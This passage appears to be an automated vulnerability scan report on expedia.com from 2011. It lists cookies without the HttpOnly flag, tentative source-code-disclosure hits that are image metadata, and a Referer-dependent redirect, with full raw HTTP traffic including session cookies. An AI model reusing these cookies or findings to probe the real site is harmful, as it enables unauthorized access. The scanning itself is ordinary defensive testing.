GET /daily/promos/deals/summervacationsale/destination_deals.asp?tab=1&dest=Las%20Vegas,%20NV&mcicid=ssdestdeal1 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 68126
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 68347
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...

3.7. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp?7854 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 9539
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 9539
Expires: Sat, 11 Dec 2010 18:01:23 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:416px;height:366px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:416px;height:366px;}
.pc
...[SNIP]...

3.8. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp?7935 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 8630
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 8630
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:308px;height:343px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:308px;height:343px;}
.pc
...[SNIP]...

3.9. http://www.expedia.com/hotel.h892034.Hotel-Information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /hotel.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:14 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/


4. Source code disclosure  previous  next
There are 4 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


4.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1306934969334"
Last-Modified: Wed, 01 Jun 2011 13:29:29 GMT
Content-Length: 1348
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

4.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1306934815898"
Last-Modified: Wed, 01 Jun 2011 13:26:55 GMT
Content-Length: 1275
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

4.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1306934901311"
Last-Modified: Wed, 01 Jun 2011 13:28:21 GMT
Content-Length: 1636
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>..M"....PLTE..i..........2X.5].....9..f.....1.-O.....m.7J......F......3Y..........5\.0T....7N.4Z.....P.8R....7O.4\....8O..9.....=.....b..O.:`..p..E./S.....Y.....e..Q........k.6[....8P.7U.8S.......8T...
...[SNIP]...

4.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"10346-1306932030475"
Last-Modified: Wed, 01 Jun 2011 12:40:30 GMT
Content-Length: 10346
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...i..........wYA....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.....$.IDATx..TKN.0..W....6.V.K...8\.{...'...!.g    ...!P.R`......    #M.8........gei.....l.....T)......F..D.F ....D.b.]^.{........<AQ.DE.z.{..Z...Cf...#...V.G.~}.....m.\J.t.).....s....kS.~f......nn."9EQfj
...[SNIP]...

5. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /hotel.h892034.Hotel-Information

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response 1

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:14 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/

Request 2

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response 2

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:29:39 GMT
Connection: close
Set-Cookie: SSRT1=ovT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:29:38 GMT


6. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

